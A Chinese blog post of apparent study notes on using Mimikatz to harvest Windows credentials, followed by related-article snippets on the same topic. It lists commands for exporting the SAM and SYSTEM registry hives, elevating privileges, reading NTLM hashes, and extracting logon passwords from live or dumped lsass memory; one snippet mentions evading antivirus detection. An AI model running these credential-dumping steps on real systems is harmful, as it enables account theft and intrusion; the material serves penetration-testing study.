Mimikatz学习笔记

最新推荐文章于 2024-05-14 22:01:51 发布
最新推荐文章于 2024-05-14 22:01:51 发布
阅读量2.6k 收藏 7
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SWEET0SWAT/article/details/104488761
版权

使用SAM和System文件抓取密码

导出sam和system文件抓取密码

reg save hklm\sam sam.hive
reg save hklm\system system.hive
在这里插入图片描述

使用mimikatz读取sam和system文件来获得NTLM Hash

lsadump::sam /sam:sam.hive /system:system.hive
在这里插入图片描述

使用mimikatz直接读取本地sam文件。

调成debug模式:privilege::debug
将权限提升至system:token::elevate
直接读取SAM文件:lsadump::sam
在这里插入图片描述

使用mimikatz在线读取SAM文件

不需要先运行mimikatz:
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords
在这里插入图片描述

mimikatz离线读取lsass.dump

需要先获得lsass的转储文件

使用mimikatz导出lsass.dump文件中的密码散列值

载入dump文件: sekurlsa::minidump lsass.DMP
导出密码: sekurlsa::logonPasswords full
在这里插入图片描述

Tr@cer
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透体系学习4
m0_55772907的博客
10-25 902
内网
Empire学习笔记.pdf
09-25
Empire还提供了丰富的命令集来管理目标主机,如 `creds` 显示或返回凭证,`download` 和 `upload` 下载或上传文件,`bypassuac` 用于绕过用户账户控制,`mimikatz` 实现内存中密码提取,`psinject` 将Payload注入到...
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1828
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
mimikatz免杀之通过SAM和System文件抓取密码
m0_47083622的博客
04-19 8569
最近学习使用Mimikatz工具抓取Windows密码时发现Procdump、SQLDumper、DumpMinitool等一系列能导出lsass进程的工具已经被360“拉黑”了。不过还可以通过SAM和System文件抓取密码和Hash,目前测试360和火绒都不会拦截 以下为操作: 利用注册表命令将目标机的sam或者system文件导出 reg save hklm\sam sam.hive reg save hklm\system system.hive 然后将目标机上的sam.hive和syst
Mimikatz安装 lsass进程 SAM NTML
banliyaoguai的博客
05-14 963
Mimikatz是一款开源的Windows安全工具,由法国安全研究员Benjamin Delpy开发。它最初被设计为用于学习C语言和进行Windows安全性实验的工具。然而,由于其强大的功能,它也可以用来从Windows系统中提取敏感信息,如明文密码、哈希值、PIN码和Kerberos票据等。总的来所它可以获取windows系统内存的密码,提供其他域的攻击方式。
读取 Windows Hash 密码两种方式
weixin_46079186的博客
12-10 956
管理员执行cmd reg save HKLM\SYSTEM C:\sys.hiv reg save HKLM\SAM C:\sam.hiv 导出注册表文件 下载mimikatz https://github.com/gentilkiwi/mimikatz/releases 配置环境变量 我们在c盘目录下,命令行直接执行 mimikatz.exe lsadump::sam /sam:sam.hiv /system:sys.hiv ...
mimikatz获取系统密码
03-28
4. **教育训练**: 在网络安全培训中,mimikatz作为学习工具,帮助学员理解特权提升和凭证盗窃的过程。 总之,mimikatz是一个强大的工具,用于获取和分析系统密码。正确理解和使用mimikatz,对于提高系统的安全性...
mimikatz最新版本
11-20
mimikatz,这款工具在信息安全领域中赫赫有名,尤其是对于系统管理员和安全研究人员来说,它是一个强大的工具,用于提取操作系统中的敏感信息,包括但不限于明文密码、NTLM哈希、kerberos票证等。最新版本的mimikatz...
mimikatz-master源码
07-22
mimikatz-master
mimikatz.rar
07-08
mimikatz:Windows平台的安全利器》 mimikatz,这个在IT安全领域备受瞩目的工具,是由法国安全研究员Benjamin Delpy开发的一款开源软件,专门针对Windows操作系统。它的存在,使得系统安全管理人员和黑客都能深入...
域横向移动分析
qq_38675102的博客
12-31 845
windwos内网横移学习笔记
破解Windows本地账户密码(拿到明文密码)
zhangkexin3的博客
01-26 817
破解Windows本地账户密码
【渗透测试笔记】之【内网渗透——Windows系统散列值获取与防范】
AA8j的博客
07-26 490
拓扑图 Windows系统散列值获取与防范 1.通过CS模块获取用户凭证信息 在获取到目标主机权限后,我们可以抓取hash和dump明文密码,这两项功能都需要管理员权限,如果权限不足,先要进行提权操作。 抓取密码哈希:右键被控主机 —> Access —> Dump Hashes [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iBCl8Ihj-1627176965164)(images/2021-07-20-16-09-45.png)] [外链图片转存失败,
获取windows用户密码——Jhon
qq_61861243的博客
10-06 2466
获取windows用户密码——Jhon
横向移动之windows登录账号密码导出
good good study
02-16 2833
在默认情况下,当系统为win10或2012R2及以上时,默认在内存缓存中禁止保存明文密码,所以无法在 lsass.exe 进程中抓取明文密码。此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
windows用户密码破解
热门推荐
qq_45927819的博客
03-03 1万+
文章目录一、hash简介二、Windows系统下的hash密码格式三、windows hash抓取1、通过SAM文件+mimikatz读取密码2、mimikatz3、procdump64+mimikatz4、QuarksPwDump5、wce四、利用Hash远程登录系统 一、hash简介 Hash主要用于信息安全领域中加密算法,渗透测试中获取目标系统的明文或Hash往往是整个渗透测试过程中重要的一环。在Windows系统中本机用户的密码Hash是放在本地的SAM文件里面,域内用户的密码Hash是存在域控的N
windows账户安全(通过mimikatz、Jhon获取用户密码)
qq_62729556的博客
07-23 2178
使用命令“john-format=NT hash.txt”使用Jhon自带的字典碰撞hash值进行破解。第一步:使用管理员权限,切换到c盘路径,执行命令“reg save hklm\sam sam.hive”和“reg save hklm\system system.hive”将注册表中SAM、System文件导出到本地磁盘。命令“ samdump2 system.hive sam.hive > hash.txt ” 使用sam dump 2工具将sam数据库文件破解成可识别的NTLM hash。
利用mimikatz抓取密码及散列值
Zlirving_的博客
01-15 1672
目录windows系统散列值获取前提介绍在线读取散列值及明文密码离线读取lsass.dmp文件防范 windows系统散列值获取 域环境中,用户信息存储在ntds.dit,加密成散列值(都为散列加密算法) LM HASH:DES加密。明文密码限定在14为以内。不够字节用0补齐 NTLM HASH:MD4加密。 前提介绍 抓取密码之前,必须为最高权限。windows下用户名、散列值及其他安全信息都保存在SAM文件中。lsass.exe进程用于实现windows安全策略. 工具: Mimikatz Procd
mimikatz下载
最新发布
05-27
Mimikatz是一个开源的命令行工具,用于在Windows操作系统中执行许多与安全相关的任务。它最初是由法国黑客Benjamin Delpy创建的,目的是用于测试Windows的安全性和漏洞。它的功能非常强大,可以用于提取Windows密码、凭据转储、解密文件等。由于Mimikatz的功能如此强大,因此它也被广泛用于安全审计和渗透测试。 请注意,Mimikatz是一款强大的工具,需要谨慎使用。它可以用于突破计算机系统的安全防御,并且在未经授权的情况下使用可能会触犯法律。只有在合法授权的情况下,才可以使用Mimikatz进行安全测试和审计。 如果您需要使用Mimikatz,请确保您已经了解了相关法律法规,并且仅在合法授权的情况下使用。同时也建议您仅在测试环境中使用Mimikatz,以免造成不必要的损失和风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值